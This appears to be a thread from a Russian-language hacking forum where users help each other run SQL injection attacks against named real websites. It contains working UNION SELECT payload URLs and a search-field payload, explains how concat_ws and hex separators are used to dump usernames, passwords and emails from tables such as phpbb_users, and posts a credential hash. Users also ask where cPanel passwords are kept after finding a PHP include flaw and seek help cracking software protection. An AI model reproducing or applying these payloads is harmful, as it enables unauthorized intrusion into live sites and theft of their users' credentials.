И вполне уязвимость, ошибка т.к. ты заэкранировал '. Попробуй передать \' , и посмотри что будет, вполне возможно, что кавычка будет экранироваться, но ты это экранирование убъёшь при помощи \., т.е. получится \\' , а значит ' - будет частью команды SQL, а не просто текстовым символом. А может и ' не заэкранируется вообще, тогда ещё проще.
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* Не могу работать с 1 колонкой как выводить юзеров я даж не представляю ЗЫ глядим в заголовок
а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
0x3a3a - это шестнадцтиричный код без 0x .. shar (58) - пишется char(58) - 58 это ascii код двоеточия : как я понял тебе интересно зачем это используется в скулях - так вот - это пишут для разделения полученых данных .. 0x3a ничем не отличается от char(58) ..
В поиске _http://investoru.info пишу '... вылазит: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13' Это уязвимость?
Да, простенькая инъекция, введи в поиске: Code: 1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* 29 поле выводится
2 Flash-ICE Еще можно юзать concat_ws(SQL hex разделителя,username,password,email,icq,blablabla) Имхо самый удобный ресурс для перевода в SQL hex - http://x3k.ru/ А вообще так мог бы почитать статьи перед тем чтобы лезть туда. Прос concat и concat_ws это уже "приятное дополнение" к статьям, даже если этого незнаешь то инъекцию всеравно раскрутишь... но основу знать надо. Есть статья которая какраз и содержит пояснения к твоему случаю со скобкой.
вопрос такой нашел пхп инклуд на сайте одном...вроде читаю пару файлов на сервере, но так как я в этом деле новичок хотелось бы узнать последствие моих действий, и ещё где хранятся пассы от Cpanel
Прогрмма Подскажите пожалуйста куда обратится с вопросом по изличению программ от "жадности"?. Надо помощь ваша в снятии защиты, распаковке, а потом взломе Des.
Вопрос такой,это че за тип хэша? Code: [email protected]:205abdfcc23287dea72cb534b5eee922561557ff4d04ed102e5a3ff8884216421f0e3dad99908345f7439f8ffabdffc4 ЫЫЫ,хэш без пробелов конечно _http://www.menunsk.ru/places.php?id=0)+union+select+concat_ws(0x3a,mail,hesh),2+from+menunsk_mail+where+id=0x31/*
2+union+select+1,concat_ws(0x3a,username,user_password),3+from+phpbb_users/* error на username 2+union+select+1,concat_ws(0x3a,0x757365726e616d65,user_password),3+from+phpbb_users/* Пропускает но все логины меняются на username. ??? не хватает прав на прасмотор столбца username ???
Что это значит? Ты выводишь 2 столбца username и user_password,они выводятся. Что тебе не нравится? Какие логины? Вот таблицы по дефолту в PhpBB 2 phpbb_users: username user_password user_email user_icq user_aim
просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' , поэтому вместо содержимого столбца username, выводится строка 'username'
Ааааа ,блин , я вопрос не сразу понял 2 tor4) Врятли на столбец нет прав доступа, давай линк, посмотрим